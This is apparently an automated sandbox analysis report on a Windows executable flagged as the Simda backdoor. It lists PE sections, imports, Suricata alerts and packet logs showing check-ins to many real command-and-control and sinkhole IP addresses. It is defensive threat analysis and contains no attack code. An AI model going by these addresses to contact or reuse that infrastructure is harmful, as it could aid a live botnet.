                                                                                                                                                                                                            ret
                                                                                                                                                                                                            int3
                                                                                                                                                                                                            int3
                                                                                                                                                                                                            int3
                                                                                                                                                                                                            int3
                                                                                                                                                                                                            int3
                                                                                                                                                                                                            int3

                                                                                                                                                                                                            Data Directories

                                                                                                                                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0xf1ec0xf0.yP
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x6f0000x2a71c.rsrc
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x9a0000x3ba.reloc
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x265600x1c.dOh
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                            Sections

                                                                                                                                                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                            .text0x10000x2db10x2e0074456d39166ecac457e6dea38fa67e5fFalse0.7233355978260869data6.451682628905373IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                            .lm0x40000x8ea10x4007dc74d85c1bcb78c5d3bf3744c32f97dFalse0.56640625data4.511827161769864IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                            .qaQL0xd0000x14d30x8008d319dd5569018475a7d09327334d337False0.50341796875data4.277994011050908IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                            .yP0xf0000xa32b0xe003ebc7447b097f60f5f6db29a207e0b9cFalse0.447265625data4.8856060140207935IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                            .bPUeWG0x1a0000x52880x800622e75bbcc0f3dd52d45ecc2a8fe2c27False0.31787109375data2.7096084234826296IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                            .PaB0x200000x16890x4005aaaa7158977a53a0f20c60022053586False0.7236328125DOS executable (COM)5.879612078165343IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                            .data0x220000x38250x3a00cf82c6486f460a4514551f47469fcf83False0.8353313577586207data6.886094570732322IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                            .dOh0x260000x1a990x6002fcbed65c7944d22457ae7a256fadfc6False0.55859375data4.5653842277254215IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                            .HvNW0x280000xae240x4000a43411ee9f7a05269be6512db445db4False0.5751953125data4.636971913033864IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                            .pPJb0x330000x78cc0x2004868d519f5124537f7860f6bf14d9e1cFalse0.59765625data4.116478928954285IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                            .bBut0x3b0000x33d120x200c11b151241704863c692ff2c4a6d7bfbFalse0.52734375data3.8766512381055493IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                            .rsrc0x6f0000x2a71c0x2a8009fc436bda1080dd296dc0e610445b944False0.9808421415441176data7.974880870915716IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                            .reloc0x9a0000x3ba0x400cdc883ee0009ab46b2a3d9904a3b9078False0.8798828125data6.522606813860574IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                                                                            Resources

                                                                                                                                                                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                            RT_ICON0x6f2f80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.4195590994371482
                                                                                                                                                                                                            RT_MENU0x703a00x90dataEnglishUnited States0.7430555555555556
                                                                                                                                                                                                            RT_MENU0x704300x42dataEnglishUnited States0.9545454545454546
                                                                                                                                                                                                            RT_MENU0x704740x96Matlab v4 mat-file (little endian) P, numeric, rows 72, columns 6422648, imaginaryEnglishUnited States0.7666666666666667
                                                                                                                                                                                                            RT_MENU0x7050c0x46dataEnglishUnited States0.9285714285714286
                                                                                                                                                                                                            RT_DIALOG0x705540x5cdataEnglishUnited States0.9239130434782609
                                                                                                                                                                                                            RT_STRING0x705b00x100dataEnglishUnited States0.7265625
                                                                                                                                                                                                            RT_STRING0x706b00x13edataEnglishUnited States0.720125786163522
                                                                                                                                                                                                            RT_STRING0x707f00x128dataEnglishUnited States0.722972972972973
                                                                                                                                                                                                            RT_RCDATA0x709180x28b94dataEnglishUnited States1.0003656986643006
                                                                                                                                                                                                            RT_GROUP_ICON0x994ac0x14dataEnglishUnited States1.1
                                                                                                                                                                                                            RT_VERSION0x994c00x25cdataEnglishUnited States0.5248344370860927

                                                                                                                                                                                                            Imports

                                                                                                                                                                                                            DLLImport
                                                                                                                                                                                                            KERNEL32.DLLGetACP, SetComputerNameA, GlobalFindAtomW, Beep, IsBadReadPtr, BeginUpdateResourceW, WaitForSingleObject, lstrcpyA, GetLogicalDrives, GetProcAddress, SetCurrentDirectoryW, FindResourceW, FileTimeToLocalFileTime, GetFileTime, GetThreadLocale, MulDiv, EnumTimeFormatsW, ExpandEnvironmentStringsA, CreateNamedPipeA, GetVolumeInformationA, GetSystemTime, GetLastError, GetProcessHeap, GetWindowsDirectoryW, GetStartupInfoW, GetSystemInfo, ExitProcess, GetTempFileNameA, GetVolumeInformationW, CreateSemaphoreA, SetCalendarInfoW, lstrcmpA, lstrcmpiA, CreateFileA, GetUserDefaultLangID, GlobalAlloc, GetModuleHandleA, GetDateFormatW, SleepEx
                                                                                                                                                                                                            user32.dllwvsprintfW, GetDesktopWindow, CopyImage, GetMenuInfo, LoadMenuW, SetWindowRgn, MessageBoxIndirectW, PostMessageA, GetActiveWindow, GetWindowRect, SetWindowPos, MonitorFromPoint, CreateDialogParamA, SetDlgItemInt, WinHelpA, GetSystemMetrics, GetDC, SetWindowLongA, GetSysColorBrush, InsertMenuA, DrawTextA, EnumDesktopWindows, InsertMenuItemW, GetWindowRgn, LoadMenuA, OpenClipboard, IsChild, EnableMenuItem, LoadMenuIndirectW, ShowCaret, SetCursorPos, MessageBeep, EnumWindows, GetClientRect, CreateDialogParamW, InsertMenuW
                                                                                                                                                                                                            gdi32.dllCreateFontIndirectA, ResizePalette, PolyBezier, SaveDC, ScaleWindowExtEx, CloseEnhMetaFile, SetBoundsRect, SetViewportExtEx
                                                                                                                                                                                                            advapi32.dllRegCreateKeyExW, RegQueryInfoKeyW, RegCreateKeyExW, RegRestoreKeyW
                                                                                                                                                                                                            COMDLG32.DLLGetOpenFileNameW, ChooseFontA, GetFileTitleW, PrintDlgExW, PrintDlgW
                                                                                                                                                                                                            SETUPAPI.DLLSetupDiSetDeviceInstallParamsA, SetupGetLineTextA, SetupQueueCopyW, SetupDiEnumDeviceInfo, pSetupVerifyCatalogFile, CM_Get_Device_Interface_List_SizeA
                                                                                                                                                                                                            VERSION.DLLVerInstallFileA, VerLanguageNameW, VerFindFileA
                                                                                                                                                                                                            urlmon.dllRegisterMediaTypes, GetClassURL
                                                                                                                                                                                                            WINMM.DLLwaveOutGetPlaybackRate, timeKillEvent
                                                                                                                                                                                                            WINSPOOL.DRVGetFormA
                                                                                                                                                                                                            INETCOMM.DLLHrAttachDataFromFile, MimeGetAddressFormatW, MimeOleGetCodePageInfo, MimeOleStripHeaders, HrGetLastOpenFileDirectoryW, MimeOleCreateSecurity

                                                                                                                                                                                                            Possible Origin

                                                                                                                                                                                                            Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                            EnglishUnited States

                                                                                                                                                                                                            Network Behavior

                                                                                                                                                                                                            Suricata IDS Alerts

                                                                                                                                                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                            2024-09-08T08:58:45.082116+02002021022ET MALWARE Wapack Labs Sinkhole DNS Reply11.1.1.153192.168.2.459394UDP
                                                                                                                                                                                                            2024-09-08T08:58:45.082125+02002021022ET MALWARE Wapack Labs Sinkhole DNS Reply11.1.1.153192.168.2.459394UDP
                                                                                                                                                                                                            2024-09-08T08:58:45.596451+02002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.449733208.100.26.24580TCP
                                                                                                                                                                                                            2024-09-08T08:58:45.600383+02002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.45532123.253.46.6480TCP
                                                                                                                                                                                                            2024-09-08T08:58:45.724093+02002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.449733208.100.26.24580TCP
                                                                                                                                                                                                            2024-09-08T08:58:45.770436+02002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.45532544.221.84.10580TCP
                                                                                                                                                                                                            2024-09-08T08:58:45.773661+02002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.45532344.221.84.10580TCP
                                                                                                                                                                                                            2024-09-08T08:58:45.781717+02002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz144.221.84.10580192.168.2.455325TCP
                                                                                                                                                                                                            2024-09-08T08:58:45.781717+02002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst144.221.84.10580192.168.2.455325TCP
                                                                                                                                                                                                            2024-09-08T08:58:45.791358+02002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.45532418.208.156.24880TCP
                                                                                                                                                                                                            2024-09-08T08:58:45.792231+02002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.4553273.94.10.3480TCP
                                                                                                                                                                                                            2024-09-08T08:58:45.792610+02002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz13.94.10.3480192.168.2.455327TCP
                                                                                                                                                                                                            2024-09-08T08:58:45.792610+02002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst13.94.10.3480192.168.2.455327TCP
                                                                                                                                                                                                            2024-09-08T08:58:45.804013+02002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz118.208.156.24880192.168.2.455324TCP
                                                                                                                                                                                                            2024-09-08T08:58:45.804013+02002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst118.208.156.24880192.168.2.455324TCP
                                                                                                                                                                                                            2024-09-08T08:58:45.816789+02002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.449732188.114.96.380TCP
                                                                                                                                                                                                            2024-09-08T08:58:46.047603+02002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.45532869.162.80.6280TCP
                                                                                                                                                                                                            2024-09-08T08:58:46.103799+02002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.45533123.253.46.6480TCP
                                                                                                                                                                                                            2024-09-08T08:58:46.618089+02002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.455329154.212.231.8280TCP
                                                                                                                                                                                                            2024-09-08T08:58:46.923911+02002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.455322178.162.203.22680TCP
                                                                                                                                                                                                            2024-09-08T08:58:47.036542+02002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.455329154.212.231.8280TCP
                                                                                                                                                                                                            2024-09-08T08:58:47.360096+02002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.455332188.114.96.3443TCP
                                                                                                                                                                                                            2024-09-08T08:58:47.721019+02002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.449732188.114.96.380TCP
                                                                                                                                                                                                            2024-09-08T08:58:48.588367+02002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.455334178.162.203.22680TCP
                                                                                                                                                                                                            2024-09-08T08:58:48.769065+02002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.4553203.64.163.5080TCP
                                                                                                                                                                                                            2024-09-08T08:58:48.971417+02002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.4553203.64.163.5080TCP
                                                                                                                                                                                                            2024-09-08T08:58:49.208568+02002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.4553303.64.163.5080TCP
                                                                                                                                                                                                            2024-09-08T08:58:49.347030+02002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.455335188.114.96.3443TCP
                                                                                                                                                                                                            2024-09-08T08:58:49.408679+02002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.4553303.64.163.5080TCP
                                                                                                                                                                                                            2024-09-08T08:59:06.689492+02002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.455326199.191.50.8380TCP
                                                                                                                                                                                                            2024-09-08T08:59:08.538523+02002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.45534469.162.80.6280TCP
                                                                                                                                                                                                            2024-09-08T08:59:28.081219+02002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.455343199.191.50.8380TCP
                                                                                                                                                                                                            2024-09-08T08:59:29.366982+02002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.45535713.248.169.4880TCP
                                                                                                                                                                                                            2024-09-08T08:59:29.617381+02002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.45535818.208.156.24880TCP
                                                                                                                                                                                                            2024-09-08T08:59:29.639731+02002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.455356188.114.96.380TCP
                                                                                                                                                                                                            2024-09-08T08:59:30.541058+02002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.455359103.150.11.23080TCP
                                                                                                                                                                                                            2024-09-08T08:59:30.941638+02002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.455360188.114.96.3443TCP
                                                                                                                                                                                                            2024-09-08T08:59:31.313726+02002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.455356188.114.96.380TCP
                                                                                                                                                                                                            2024-09-08T08:59:32.685205+02002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.455363188.114.96.3443TCP
                                                                                                                                                                                                            2024-09-08T08:59:52.350601+02002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.455359103.150.11.23080TCP
                                                                                                                                                                                                            2024-09-08T08:59:56.990734+02002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.45150764.225.91.7380TCP
                                                                                                                                                                                                            2024-09-08T08:59:57.467266+02002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.45150844.221.84.10580TCP
                                                                                                                                                                                                            2024-09-08T08:59:57.467281+02002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.45150915.197.240.2080TCP
                                                                                                                                                                                                            2024-09-08T08:59:57.579475+02002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.451512103.224.212.10880TCP
                                                                                                                                                                                                            2024-09-08T08:59:57.594988+02002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.451510103.224.182.25280TCP
                                                                                                                                                                                                            2024-09-08T08:59:57.848385+02002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.451511154.85.183.5080TCP
                                                                                                                                                                                                            2024-09-08T08:59:58.262225+02002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.451511154.85.183.5080TCP
                                                                                                                                                                                                            2024-09-08T09:00:00.252851+02002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.45151572.52.179.17480TCP
                                                                                                                                                                                                            2024-09-08T09:00:00.448934+02002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.45151664.225.91.7380TCP
                                                                                                                                                                                                            2024-09-08T09:00:00.763688+02002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.45151772.52.179.17480TCP
                                                                                                                                                                                                            2024-09-08T09:00:04.163069+02002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.45151852.34.198.22980TCP
                                                                                                                                                                                                            2024-09-08T09:00:04.164384+02002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz152.34.198.22980192.168.2.451518TCP
                                                                                                                                                                                                            2024-09-08T09:00:04.164384+02002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst152.34.198.22980192.168.2.451518TCP
                                                                                                                                                                                                            2024-09-08T09:00:08.190889+02002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.45193644.221.84.10580TCP
                                                                                                                                                                                                            2024-09-08T09:00:12.599932+02002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.45404623.253.46.6480TCP
                                                                                                                                                                                                            2024-09-08T09:00:12.599941+02002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.4612613.64.163.5080TCP
                                                                                                                                                                                                            2024-09-08T09:00:12.599987+02002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.454044208.100.26.24580TCP
                                                                                                                                                                                                            2024-09-08T09:00:12.600150+02002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.45404269.162.80.6280TCP
                                                                                                                                                                                                            2024-09-08T09:00:12.600823+02002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.454043188.114.96.380TCP
                                                                                                                                                                                                            2024-09-08T09:00:12.601247+02002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.454047154.212.231.8280TCP
                                                                                                                                                                                                            2024-09-08T09:00:12.724904+02002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.454044208.100.26.24580TCP
                                                                                                                                                                                                            2024-09-08T09:00:12.797489+02002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.4612613.64.163.5080TCP
                                                                                                                                                                                                            2024-09-08T09:00:12.890656+02002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.454048178.162.203.22680TCP
                                                                                                                                                                                                            2024-09-08T09:00:13.029219+02002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.454047154.212.231.8280TCP
                                                                                                                                                                                                            2024-09-08T09:00:13.127782+02002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.45404923.253.46.6480TCP
                                                                                                                                                                                                            2024-09-08T09:00:14.725503+02002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.454050188.114.96.3443TCP
                                                                                                                                                                                                            2024-09-08T09:00:14.725976+02002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.454051178.162.203.22680TCP
                                                                                                                                                                                                            2024-09-08T09:00:14.896179+02002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.461260199.191.50.8380TCP
                                                                                                                                                                                                            2024-09-08T09:00:14.896238+02002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.4540453.64.163.5080TCP
                                                                                                                                                                                                            2024-09-08T09:00:14.896275+02002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.454052188.114.96.380TCP
                                                                                                                                                                                                            2024-09-08T09:00:18.602751+02002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.4540533.64.163.5080TCP
                                                                                                                                                                                                            2024-09-08T09:00:18.989971+02002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.454054199.191.50.8380TCP
                                                                                                                                                                                                            2024-09-08T09:00:20.346942+02002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.454055188.114.96.380TCP
                                                                                                                                                                                                            2024-09-08T09:00:20.656732+02002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.454056103.150.11.23080TCP
                                                                                                                                                                                                            2024-09-08T09:00:22.044255+02002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.454057188.114.96.3443TCP
                                                                                                                                                                                                            2024-09-08T09:00:22.196782+02002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.454056103.150.11.23080TCP
                                                                                                                                                                                                            2024-09-08T09:00:22.419539+02002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.454055188.114.96.380TCP
                                                                                                                                                                                                            2024-09-08T09:00:25.050995+02002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.454059188.114.96.3443TCP
                                                                                                                                                                                                            2024-09-08T09:00:25.770013+02002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.454060103.224.182.25280TCP
                                                                                                                                                                                                            2024-09-08T09:00:25.855231+02002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.454061103.224.212.10880TCP
                                                                                                                                                                                                            2024-09-08T09:00:26.125598+02002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.454062154.85.183.5080TCP
                                                                                                                                                                                                            2024-09-08T09:00:26.452662+02002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.454062154.85.183.5080TCP
                                                                                                                                                                                                            2024-09-08T09:00:28.254679+02002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.45406572.52.179.17480TCP
                                                                                                                                                                                                            2024-09-08T09:00:28.911578+02002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.45406672.52.179.17480TCP

                                                                                                                                                                                                            Network Port Distribution

                                                                                                                                                                                                            TCP Packets

                                                                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                            Sep 8, 2024 08:58:44.101291895 CEST4973280192.168.2.4188.114.96.3
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.067776918 CEST4973380192.168.2.4208.100.26.245
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.069333076 CEST8049732188.114.96.3192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.069436073 CEST4973280192.168.2.4188.114.96.3
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.069648981 CEST4973280192.168.2.4188.114.96.3
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.074129105 CEST8049733208.100.26.245192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.074198008 CEST4973380192.168.2.4208.100.26.245
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.074459076 CEST4973380192.168.2.4208.100.26.245
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.076035023 CEST8049732188.114.96.3192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.080823898 CEST8049733208.100.26.245192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.081279993 CEST5532080192.168.2.43.64.163.50
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.084065914 CEST5532180192.168.2.423.253.46.64
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.086045027 CEST80553203.64.163.50192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.086103916 CEST5532080192.168.2.43.64.163.50
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.087038040 CEST5532080192.168.2.43.64.163.50
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.088805914 CEST805532123.253.46.64192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.088871002 CEST5532180192.168.2.423.253.46.64
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.089159012 CEST5532180192.168.2.423.253.46.64
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.091753006 CEST80553203.64.163.50192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.093875885 CEST805532123.253.46.64192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.264342070 CEST5532280192.168.2.4178.162.203.226
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.269212961 CEST8055322178.162.203.226192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.269268036 CEST5532280192.168.2.4178.162.203.226
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.269939899 CEST5532280192.168.2.4178.162.203.226
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.274720907 CEST8055322178.162.203.226192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.281385899 CEST5532380192.168.2.444.221.84.105
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.286231995 CEST805532344.221.84.105192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.286293030 CEST5532380192.168.2.444.221.84.105
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.286434889 CEST5532380192.168.2.444.221.84.105
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.291306019 CEST805532344.221.84.105192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.292587996 CEST5532480192.168.2.418.208.156.248
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.297631979 CEST805532418.208.156.248192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.297693968 CEST5532480192.168.2.418.208.156.248
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.297926903 CEST5532480192.168.2.418.208.156.248
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.298744917 CEST5532580192.168.2.444.221.84.105
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.302659988 CEST805532418.208.156.248192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.303570986 CEST805532544.221.84.105192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.303623915 CEST5532580192.168.2.444.221.84.105
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.305692911 CEST5532580192.168.2.444.221.84.105
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.310539961 CEST805532544.221.84.105192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.315977097 CEST5532680192.168.2.4199.191.50.83
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.319499016 CEST5532780192.168.2.43.94.10.34
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.320796013 CEST8055326199.191.50.83192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.320868969 CEST5532680192.168.2.4199.191.50.83
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.320972919 CEST5532680192.168.2.4199.191.50.83
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.324326992 CEST80553273.94.10.34192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.324397087 CEST5532780192.168.2.43.94.10.34
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.324522972 CEST5532780192.168.2.43.94.10.34
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.325799942 CEST8055326199.191.50.83192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.329314947 CEST80553273.94.10.34192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.510967016 CEST5532880192.168.2.469.162.80.62
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.515906096 CEST805532869.162.80.62192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.515964985 CEST5532880192.168.2.469.162.80.62
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.521517038 CEST5532880192.168.2.469.162.80.62
